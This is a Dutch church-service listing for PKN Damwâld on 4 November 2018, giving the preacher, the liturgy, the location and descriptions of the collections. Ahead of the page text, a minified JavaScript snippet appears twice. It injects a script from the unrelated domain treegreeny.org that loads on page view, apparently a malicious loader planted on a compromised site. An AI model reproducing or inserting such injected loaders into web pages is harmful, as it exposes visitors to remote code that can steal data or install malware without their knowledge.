;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 4 november 2018 9:30 uur - PKN Damwâld
zondag 4 november 2018
09:30 uur
Voorbereiding Heilig Avondmaal en koffiedrinken na de dienst

Kerkdienst zondag 4 november 2018 9:30 uur

Thema: God 24/7

Informatie

Voorganger:Ds. G.J. van Wieren, Oosternijkerk
Organist:Thom de Boer
Thema:God 24/7
Mededeling:Voorbereiding Heilig Avondmaal en koffiedrinken na de dienst
Liturgie
Lied voor de dienst Elb 8
Welkom
Intochtslied : Ps. 150
Stilte van voorbereiding,Votum en groet
Gebed
We zingen: Elb 170
Tekst van de week Psalm 13
We zingen: Gez. 255
We lezen: Psalm 42
Overdenking God 24/7
We zingen: Gez. 429
Avondmaalsformulier
Gebed
Collecte
Slotlied : Gez. 44
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Pastoraal Diaconaal Centrum de Herberg

Het Pastoraal Diaconaal Centrum De Herberg wil als verlengstuk van de plaatselijke kerkelijke gemeente een tijdelijk huis en geestelijke begeleiding bieden aan individuele gemeenteleden die, om wat voor reden ook, even afstand willen nemen van hun woon/werksituatie en zich willen bezinnen op levensvragen. Daarbij kunnen psycho-sociale problemen een rol spelen. De stichting tracht haar doel te bereiken door het bieden van: een Christelijke leefgemeenschap; individuele geestelijke begeleiding door professionele begeleiders; een beperkt dagprogramma, rust en ruimte; advies met betrekking tot nazorg en informatie en advies aan de plaatselijk gemeente

Tweede collecte: Kerk
Uitganscollecte: Najaarszendingsweek: Meer kansen voor inheemse bevolking

Sinds januari 2015 is Nienke Pruiksma uitgezonden naar Brazilië. Zij is verbonden aan COMIN, een kerkelijke organisatie die zich inzet voor interculturele en interreligieuze dialoog tussen inheemse en niet-inheemse bevolkingsgroepen. COMIN ondersteunt inheemse volkeren daarnaast op het gebied van onderwijs, gezondheidszorg en landrechten. Brazilië telt veel inheemse volken, maar er bestaan veel vooroordelen over deze bevolkingsgroepen. COMIN wil met uitwisselingsprojecten, onderwijs en publicaties een brug tussen inheemsen en niet-inheemsen, en de kennis over gewoonten en leefwijze van inheemse volkeren vergroten. COMIN stimuleert dat mensen binnen de kerken en in het (theologische) onderwijs meer te weten komen over de inheemse bevolking. Nienke is nauw bij dit onderwijs betrokken. Zij verzorgt lessen en cursussen en denkt mee over de lesstof en -materialen.